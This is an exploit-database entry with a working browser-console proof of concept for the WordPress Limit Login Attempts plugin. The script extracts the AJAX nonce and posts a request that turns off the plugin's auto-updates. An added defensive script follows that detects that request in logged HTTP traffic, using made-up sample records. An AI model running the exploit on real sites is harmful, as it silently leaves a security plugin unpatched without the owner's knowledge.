## https://sploitus.com/exploit?id=WPEX-ID:654BAD15-1C88-446A-B28B-5A412CC0399D
As an Admin, open the Limit Login Attempts page in WP Admin and run the following code in the browser console:

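```js
// Pull the AJAX nonce (the `sec` value) out of the inline script on the settings page.
const nonce = document.documentElement.innerHTML.match( /sec: '(\w+)'/ )[1];
// POST the plugin's toggle_auto_update AJAX action with value=no, using the admin session cookies.
await (await fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded; charset=UTF-8",
  },
  "body": "action=toggle_auto_update&value=no&sec=" + nonce,
  "method": "POST",
  "mode": "cors",
  "credentials": "include"
})).text();
```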

Then confirm that auto-updates have been disabled for the Limit Login Attempts plugin.
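
For defenders reviewing captured traffic, the following added example (not part of the original page or the plugin's code) flags requests that match the call above: `action=toggle_auto_update` with `value=no` sent to `admin-ajax.php`. The record shape (`ts`, `src`, `method`, `url`, `body`) and the sample records are constructed assumptions, standing in for a proxy or WAF audit log that stores request bodies.

```javascript
// Added example: detect the auto-update-disable request in logged HTTP records.
// Assumption: each record is { ts, src, method, url, body } with the raw form body.

function parseRequest(record) {
  // WordPress resolves the AJAX action from $_REQUEST, so the parameters may
  // arrive in the query string, the form body, or both. Merge them, letting
  // body values override query values.
  const url = new URL(record.url, "https://site.invalid"); // placeholder base
  const params = new URLSearchParams(url.search);
  for (const [key, value] of new URLSearchParams(record.body || "")) {
    params.set(key, value);
  }
  return { path: url.pathname, params };
}

function findAutoUpdateDisables(records) {
  return records
    .filter((record) => {
      const { path, params } = parseRequest(record);
      return (
        path.endsWith("/wp-admin/admin-ajax.php") &&
        params.get("action") === "toggle_auto_update" &&
        params.get("value") === "no"
      );
    })
    .map((record) => ({ ts: record.ts, src: record.src }));
}

// Constructed sample records (documentation IP range, made-up nonces).
const sampleRecords = [
  { ts: "2024-01-01T10:00:00Z", src: "192.0.2.10", method: "POST",
    url: "/wp-admin/admin-ajax.php",
    body: "action=toggle_auto_update&value=no&sec=abc123" },
  { ts: "2024-01-01T10:00:05Z", src: "192.0.2.10", method: "POST",
    url: "/wp-admin/admin-ajax.php",
    body: "action=heartbeat&interval=60" },
  { ts: "2024-01-01T10:01:00Z", src: "192.0.2.44", method: "POST",
    url: "/wp-admin/admin-ajax.php?action=toggle_auto_update",
    body: "sec=def456&value=no" },
  { ts: "2024-01-01T10:02:00Z", src: "192.0.2.10", method: "POST",
    url: "/wp-admin/admin-ajax.php",
    body: "action=toggle_auto_update&value=yes&sec=abc123" },
];

console.log(findAutoUpdateDisables(sampleRecords));
```

Each hit is worth correlating with the account that owned the session and with the plugin's current auto-update state.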